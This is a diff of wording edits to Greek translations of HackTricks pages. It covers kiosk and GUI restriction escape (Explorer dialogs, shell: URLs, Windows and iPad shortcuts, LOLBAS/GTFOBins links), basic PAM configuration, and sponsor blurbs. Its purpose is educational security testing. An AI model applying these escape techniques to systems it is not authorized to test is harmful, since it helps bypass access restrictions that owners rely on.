|
@ -28,7 +28,7 @@
|
|||
|
||||
# Έλεγχος για πιθανές ενέργειες μέσα στην εφαρμογή GUI
|
||||
|
||||
Οι **Κοινές Διάλογοι** είναι αυτές οι επιλογές όπως **αποθήκευση ενός αρχείου**, **άνοιγμα ενός αρχείου**, επιλογή γραμματοσειράς, χρώματος... Οι περισσότεροι από αυτούς θα **προσφέρουν πλήρη λειτουργικότητα Explorer**. Αυτό σημαίνει ότι θα μπορείτε να έχετε πρόσβαση σε λειτουργίες του Explorer αν μπορείτε να έχετε πρόσβαση σε αυτές τις επιλογές:
|
||||
Οι **Κοινές Διάλογοι** είναι αυτές οι επιλογές για **αποθήκευση ενός αρχείου**, **άνοιγμα ενός αρχείου**, επιλογή γραμματοσειράς, χρώματος... Οι περισσότεροι από αυτούς θα **προσφέρουν πλήρη λειτουργικότητα Explorer**. Αυτό σημαίνει ότι θα μπορείτε να έχετε πρόσβαση σε λειτουργίες Explorer αν μπορείτε να έχετε πρόσβαση σε αυτές τις επιλογές:
|
||||
|
||||
* Κλείσιμο/Κλείσιμο ως
|
||||
* Άνοιγμα/Άνοιγμα με
|
||||
|
@ -50,7 +50,7 @@
|
|||
|
||||
### Windows
|
||||
|
||||
Για παράδειγμα _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ βρείτε περισσότερα δυαδικά που μπορούν να χρησιμοποιηθούν για την εκτέλεση εντολών (και εκτέλεση απροσδόκητων ενεργειών) εδώ: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
|
||||
Για παράδειγμα _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ βρείτε περισσότερα δυαδικά που μπορούν να χρησιμοποιηθούν για την εκτέλεση εντολών (και την εκτέλεση απροσδόκητων ενεργειών) εδώ: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
|
||||
|
||||
### \*NIX __
|
||||
|
||||
|
@ -85,7 +85,7 @@ _bash, sh, zsh..._ Περισσότερα εδώ: [https://gtfobins.github.io/](
|
|||
|
||||
Κονσόλα: [https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
|
||||
Εξερευνητής: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
|
||||
Επεξεργαστής μητρώου: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
|
||||
Επεξεργαστής καταχωρήσεων: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
|
||||
|
||||
## Πρόσβαση στο σύστημα αρχείων από τον περιηγητή
|
||||
|
||||
|
@ -108,13 +108,13 @@ _bash, sh, zsh..._ Περισσότερα εδώ: [https://gtfobins.github.io/](
|
|||
* Filter Keys – Κρατήστε πατημένο το δεξί SHIFT για 12 δευτερόλεπτα
|
||||
* WINDOWS+F1 – Αναζήτηση Windows
|
||||
* WINDOWS+D – Εμφάνιση επιφάνειας εργασίας
|
||||
* WINDOWS+E – Εκκίνηση του Windows Explorer
|
||||
* WINDOWS+E – Εκκίνηση του Εξερευνητή των Windows
|
||||
* WINDOWS+R – Εκτέλεση
|
||||
* WINDOWS+U – Κέντρο Ευκολιών Πρόσβασης
|
||||
* WINDOWS+F – Αναζήτηση
|
||||
* SHIFT+F10 – Μενού περιβάλλοντος
|
||||
* SHIFT+F10 – Μενού Περιβάλλοντος
|
||||
* CTRL+SHIFT+ESC – Διαχειριστής Εργασιών
|
||||
* CTRL+ALT+DEL – Οθόνη εκκίνησης σε νεότερες εκδόσεις των Windows
|
||||
* CTRL+ALT+DEL – Οθόνη εκκίνησης σε νεότερες εκδόσεις Windows
|
||||
* F1 – Βοήθεια F3 – Αναζήτηση
|
||||
* F6 – Γραμμή διεύθυνσης
|
||||
* F11 – Εναλλαγή πλήρους οθόνης μέσα στο Internet Explorer
|
||||
|
@ -134,11 +134,11 @@ _bash, sh, zsh..._ Περισσότερα εδώ: [https://gtfobins.github.io/](
|
|||
|
||||
### 'Εργαλείο Εικόνας'
|
||||
|
||||
Είναι ένα εργαλείο που εμφανίζεται στην επάνω αριστερή πλευρά της εικόνας όταν γίνεται κλικ. Θα μπορείτε να Αποθηκεύσετε, Εκτυπώσετε, Αποστείλετε μέσω ηλεκτρονικού ταχυδρομείου, Ανοίξετε το "Οι Εικόνες μου" στον Explorer. Το Kiosk πρέπει να χρησιμοποιεί τον Internet Explorer.
|
||||
Είναι ένα εργαλείο που εμφανίζεται στην πάνω αριστερή πλευρά της εικόνας όταν γίνει κλικ. Θα μπορείτε να Αποθηκεύσετε, Εκτυπώσετε, Αποστείλετε μέσω email, Ανοίξετε το "Οι Εικόνες μου" στον Εξερευνητή. Το Kiosk πρέπει να χρησιμοποιεί τον Internet Explorer.
|
||||
|
||||
### Πρωτόκολλο Κέλυφους
|
||||
|
||||
Πληκτρολογήστε αυτές τις διευθύνσεις URL για να λάβετε μια προβολή Explorer:
|
||||
Πληκτρολογήστε αυτές τις διευθύνσεις URL για να λάβετε μια προβολή του Εξερευνητή:
|
||||
|
||||
* `shell:Administrative Tools`
|
||||
* `shell:DocumentsLibrary`
|
||||
|
@ -181,20 +181,20 @@ _bash, sh, zsh..._ Περισσότερα εδώ: [https://gtfobins.github.io/](
|
|||
## Χειρονομίες και κουμπιά
|
||||
|
||||
* Σύρετε προς τα επάνω με τέσσερα (ή πέντε) δάχτυλα / Διπλό πάτημα στο κουμπί Αρχικής: Για να δείτε την προβολή πολλαπλών εργασιών και να αλλάξετε Εφαρμογή
|
||||
* Σύρετε με έναν τρόπο ή άλλο με τέσσερα ή πέντε δάχτυλα: Προκειμένου να αλλάξετε στην επόμενη/τελευταία Εφαρμογή
|
||||
* Κλείστε την οθόνη με πέντε δάχτυλα / Αγγίξτε το κουμπί Αρχικής / Σύρετε προς τα επάνω με 1 δάχτυλο από το κάτω μέρος της οθόνης με γρήγορη κίνηση προς τα πάνω: Για πρόσβαση στην Αρχική
|
||||
* Σύρετε με έναν τρόπο ή άλλο με τέσσερα ή πέντε δάχτυλα: Προκειμένου να αλλάξετε στην επόμενη/προηγούμενη Εφαρμογή
|
||||
* Κλείστε την οθόνη με πέντε δάχτυλα / Αγγίξτε το κουμπί Αρχικής / Σύρετε προς τα επάνω με ένα δάχτυλο από το κάτω μέρος της οθόνης με γρήγορη κίνηση προς τα πάνω: Για να έχετε πρόσβαση στην Αρχική
|
||||
* Σύρετε ένα δάχτυλο από το κάτω μέρος της οθόνης μόλις 1-2 ίντσες (αργά): Θα εμφανιστεί η βάση
|
||||
* Σύρετε προς τα κάτω από την κορυφή της οθόνης με 1 δάχτυλο: Για να δείτε τις ειδοποιήσεις σας
|
||||
* Σύρετε προς τα κάτω με 1 δάχτυλο στην πάνω δεξιά γωνία της οθόνης: Για να δείτε το κέντρο ελέγχου του iPad Pro
|
||||
* Σύρετε προς τα κάτω από την κορυφή της οθόνης με ένα δάχτυλο: Για να δείτε τις ειδοποιήσεις σας
|
||||
* Σύρετε προς τα κάτω με ένα δάχτυλο στην πάνω δεξιά γωνία της οθόνης: Για να δείτε το κέντρο ελέγχου του iPad Pro
|
||||
* Σύρετε ένα δάχτυλο από τα αριστερά της οθόνης 1-2 ίντσες: Για να δείτε την προβολή Σήμερα
|
||||
* Σύρετε γρήγορα ένα δάχτυλο από το κέντρο της οθόνης προς τα δεξιά ή αριστερά: Για να αλλάξετε στην επόμενη/τελευταία Εφαρμογή
|
||||
* Πατήστε και κρατήστε πατημένο το κουμπί Ενεργοποίησης/Απενεργοποίησης στην πάνω-δεξιά γωνία του iPad + Μετακινήστε τον Ρυθμιστικό Ισχύος προς το "απενεργοποίηση" όλο το δρόμο προς τα δεξιά: Για να απενεργοποιήσετε
|
||||
* Σύρετε γρήγορα ένα δάχτυλο από το κέντρο της οθόνης προς τα δεξιά ή αριστερά: Για να αλλάξετε στην επόμενη/προηγούμενη Εφαρμογή
|
||||
* Πατήστε και κρατήστε πατημένο το κουμπί Ενεργοποίησης/Απενεργοποίησης στην πάνω-δεξιά γωνία του iPad + Μετακινήστε τον Ρυθμιστή Απενεργοποίησης όλο τον δρόμο προς τα δεξιά: Για να απενεργοποιήσετε
|
||||
* Πατήστε το κουμπί Ενεργοποίησης/Απενεργοποίησης στην πάνω-δεξιά γωνία του iPad και το κουμπί Αρχικής για λίγα δευτερόλεπτα: Για να επιβάλετε μια σκληρή απενεργοποίηση
|
||||
* Πατήστε το κουμπί Ενεργοποίησης/Απενεργοποίησης στην πάνω-δεξιά γωνία του iPad και το κουμπί Αρχικής γρήγορα: Για να τραβήξετε μια στιγμιότυπη εικόνα που θα εμφανιστεί στην κάτω αριστερή γωνία της οθόνης. Πατήστε και τα δύο κουμπιά ταυτόχρονα πολύ σύντομα όπως αν τα κρατάτε λίγα δευτερόλεπτα θα πραγματοποιηθεί μια σκληρή απενεργοποίηση
|
||||
* Πατήστε το κουμπί Ενεργοποίησης/Απενεργοποίησης στην πάνω-δεξιά γωνία του iPad και το κουμπί Αρχικής γρήγορα: Για να τραβήξετε μια στιγμιότυπη που θα εμφανιστεί στην κάτω αριστερή γωνία της οθόνης. Πατήστε και τα δύο κουμπιά ταυτόχρονα πολύ σύντομα όπως αν τα κρατάτε λίγα δευτερόλεπτα θα πραγματοποιηθεί μια σκληρή απενεργοποίηση
|
||||
|
||||
## Συντομεύσεις
|
||||
|
||||
Θα πρέπει να έχετε ένα πληκτρολόγιο iPad ή έναν προσαρμογέα πληκτρολογίου USB. Θα εμφανιστούν μόνο οι συντομεύσεις που μπορούν να βοηθήσουν στην απόδραση από την εφαρμογή εδώ.
|
||||
Θα πρέπει να έχετε ένα πληκτρολόγιο iPad ή έναν προσαρμογέα πληκτρολογίου USB. Εδώ θα εμφανιστούν μόνο οι συντομεύσεις πληκτρολογίου που μπορούν να βοηθήσουν στην απόδραση από την εφαρμογή.
|
||||
|
||||
| Κλειδί | Όνομα |
|
||||
| --- | ------------ |
|
||||
|
@ -225,7 +225,7 @@ _bash, sh, zsh..._ Περισσότερα εδώ: [https://gtfobins.github.io/](
|
|||
| F12 | Αύξηση έντασης |
|
||||
| ⌘ Space | Εμφάνιση λίστας διαθέσιμων γλωσσών. Για να επιλέξετε μία, πατήστε ξανά το πλήκτρο διαστήματος. |
|
||||
|
||||
### Πλοήγηση iPad
|
||||
### Πλοήγηση στο iPad
|
||||
|
||||
| Συντόμευση | Ενέργεια |
|
||||
| -------------------------------------------------- | ------------------------------------------------------- |
|
||||
|
@ -234,34 +234,34 @@ _bash, sh, zsh..._ Περισσότερα εδώ: [https://gtfobins.github.io/](
|
|||
| ⌘ (Space) | Άνοιγμα Spotlight |
|
||||
| ⌘⇥ (Command-Tab) | Λίστα των τελευταίων δέκα χρησιμοποιημένων εφαρμογών |
|
||||
| ⌘\~ | Μετάβαση στην τελευταία Εφαρμογή |
|
||||
| ⌘⇧3 (Command-Shift-3) | Στιγμιότυπο οθόνης (εμφανίζεται στην κάτω αριστερή γωνία για αποθήκευση
|
||||
| ⌘⇧3 (Command-Shift-3) | Στιγμιότυπο οθόνης (εμφανίζεται στην κάτω αριστερή γωνία
|
||||
### Συντομεύσεις Safari
|
||||
|
||||
| Συντόμευση | Ενέργεια |
|
||||
| ----------------------- | ------------------------------------------------ |
|
||||
| ⌘L (Command-L) | Άνοιγμα τοποθεσίας |
|
||||
| ⌘T | Άνοιγμα νέας καρτέλας |
|
||||
| ⌘W | Κλείσιμο της τρέχουσας καρτέλας |
|
||||
| ⌘R | Ανανέωση της τρέχουσας καρτέλας |
|
||||
| ⌘. | Διακοπή φόρτωσης της τρέχουσας καρτέλας |
|
||||
| ^⇥ | Μετάβαση στην επόμενη καρτέλα |
|
||||
| ^⇧⇥ (Control-Shift-Tab) | Μετάβαση στην προηγούμενη καρτέλα |
|
||||
| Συντόμευση | Ενέργεια |
|
||||
| ----------------------- | -------------------------------------------------- |
|
||||
| ⌘L (Command-L) | Άνοιγμα τοποθεσίας |
|
||||
| ⌘T | Άνοιγμα νέας καρτέλας |
|
||||
| ⌘W | Κλείσιμο της τρέχουσας καρτέλας |
|
||||
| ⌘R | Ανανέωση της τρέχουσας καρτέλας |
|
||||
| ⌘. | Διακοπή φόρτωσης της τρέχουσας καρτέλας |
|
||||
| ^⇥ | Μετάβαση στην επόμενη καρτέλα |
|
||||
| ^⇧⇥ (Control-Shift-Tab) | Μετάβαση στην προηγούμενη καρτέλα |
|
||||
| ⌘L | Επιλογή του πεδίου κειμένου/URL για τροποποίηση |
|
||||
| ⌘⇧T (Command-Shift-T) | Άνοιγμα τελευταίας κλεισμένης καρτέλας (μπορεί να χρησιμοποιηθεί πολλές φορές) |
|
||||
| ⌘\[ | Πήγαινε πίσω σε μια σελίδα στο ιστορικό περιήγησής σας |
|
||||
| ⌘] | Πήγαινε μπροστά σε μια σελίδα στο ιστορικό περιήγησής σας |
|
||||
| ⌘⇧T (Command-Shift-T) | Άνοιγμα τελευταίας κλεισμένης καρτέλας |
|
||||
| ⌘\[ | Πήγαινε πίσω μια σελίδα στο ιστορικό περιήγησης |
|
||||
| ⌘] | Πήγαινε μπροστά μια σελίδα στο ιστορικό περιήγησης |
|
||||
| ⌘⇧R | Ενεργοποίηση λειτουργίας Αναγνώστη |
|
||||
|
||||
### Συντομεύσεις Mail
|
||||
|
||||
| Συντόμευση | Ενέργεια |
|
||||
| Συντόμευση | Ενέργεια |
|
||||
| -------------------------- | ---------------------------- |
|
||||
| ⌘L | Άνοιγμα τοποθεσίας |
|
||||
| ⌘T | Άνοιγμα νέας καρτέλας |
|
||||
| ⌘L | Άνοιγμα τοποθεσίας |
|
||||
| ⌘T | Άνοιγμα νέας καρτέλας |
|
||||
| ⌘W | Κλείσιμο της τρέχουσας καρτέλας |
|
||||
| ⌘R | Ανανέωση της τρέχουσας καρτέλας |
|
||||
| ⌘R | Ανανέωση της τρέχουσας καρτέλας |
|
||||
| ⌘. | Διακοπή φόρτωσης της τρέχουσας καρτέλας |
|
||||
| ⌘⌥F (Command-Option/Alt-F) | Αναζήτηση στο εισερχόμενο ταχυδρομείο σας |
|
||||
| ⌘⌥F (Command-Option/Alt-F) | Αναζήτηση στο εισερχόμενα σας |
|
||||
|
||||
# Αναφορές
|
||||
|
||||
|
@ -271,28 +271,28 @@ _bash, sh, zsh..._ Περισσότερα εδώ: [https://gtfobins.github.io/](
|
|||
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των λεηλασιών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -7,20 +7,20 @@
|
|||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας κινητήρας αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον κινητήρα τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -28,7 +28,7 @@
|
|||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Το **PAM (Pluggable Authentication Modules)** λειτουργεί ως μηχανισμός ασφαλείας που **επαληθεύει την ταυτότητα των χρηστών που προσπαθούν να έχουν πρόσβαση σε υπηρεσίες υπολογιστών**, ελέγχοντας την πρόσβασή τους με βάση διάφορα κριτήρια. Είναι παρόμοιο με έναν ψηφιακό πύλωνα, εξασφαλίζοντας ότι μόνο εξουσιοδοτημένοι χρήστες μπορούν να αλληλεπιδρούν με συγκεκριμένες υπηρεσίες, ενώ πιθανώς περιορίζει τη χρήση τους για να αποτρέψει υπερφορτώσεις συστήματος.
|
||||
Το **PAM (Pluggable Authentication Modules)** λειτουργεί ως ένα μηχανισμός ασφαλείας που **επαληθεύει την ταυτότητα των χρηστών που προσπαθούν να έχουν πρόσβαση σε υπηρεσίες υπολογιστών**, ελέγχοντας την πρόσβασή τους με βάση διάφορα κριτήρια. Είναι παρόμοιο με έναν ψηφιακό κηδεμόνα, εξασφαλίζοντας ότι μόνο εξουσιοδοτημένοι χρήστες μπορούν να αλληλεπιδρούν με συγκεκριμένες υπηρεσίες, ενώ πιθανώς περιορίζει τη χρήση τους για να αποτρέψει τις υπερφορτώσεις του συστήματος.
|
||||
|
||||
### Αρχεία Διαμόρφωσης
|
||||
|
||||
|
@ -50,12 +50,12 @@ session required /lib/security/pam_unix_session.so
|
|||
```
|
||||
### **Πραγματικά Τομείς Διαχείρισης PAM**
|
||||
|
||||
Αυτοί οι τομείς, ή ομάδες διαχείρισης, περιλαμβάνουν τα **auth**, **account**, **password**, και **session**, κάθε ένας υπεύθυνος για διαφορετικές πτυχές της διαδικασίας πιστοποίησης και διαχείρισης συνεδρίας:
|
||||
Αυτοί οι τομείς, ή ομάδες διαχείρισης, περιλαμβάνουν τους **auth**, **account**, **password**, και **session**, κάθε ένας υπεύθυνος για διαφορετικές πτυχές της διαδικασίας πιστοποίησης και διαχείρισης συνεδρίας:
|
||||
|
||||
- **Auth**: Επικυρώνει την ταυτότητα του χρήστη, συχνά μέσω προτροπής για κωδικό πρόσβασης.
|
||||
- **Account**: Χειρίζεται τον έλεγχο του λογαριασμού, ελέγχοντας συνθήκες όπως η ομάδα στην οποία ανήκει ή περιορισμούς ώρας της ημέρας.
|
||||
- **Password**: Διαχειρίζεται τις ενημερώσεις κωδικού πρόσβασης, συμπεριλαμβανομένων ελέγχων πολυπλοκότητας ή πρόληψης επιθέσεων λεξικού.
|
||||
- **Session**: Διαχειρίζεται ενέργειες κατά την έναρξη ή το τέλος μιας υπηρεσίας συνεδρίας, όπως η προσάρτηση καταλόγων ή η οριοθέτηση πόρων.
|
||||
- **Session**: Διαχειρίζεται ενέργειες κατά την έναρξη ή το τέλος μιας συνεδρίας υπηρεσίας, όπως η προσάρτηση καταλόγων ή η οριοθέτηση πόρων.
|
||||
|
||||
### **Ελέγχοι Ενοτήτων PAM**
|
||||
|
||||
|
@ -74,15 +74,15 @@ session required /lib/security/pam_unix_session.so
|
|||
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -97,6 +97,6 @@ session required /lib/security/pam_unix_session.so
|
|||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -14,13 +14,13 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων με αντάλλαγμα λύτρων που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -30,12 +30,12 @@
|
|||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
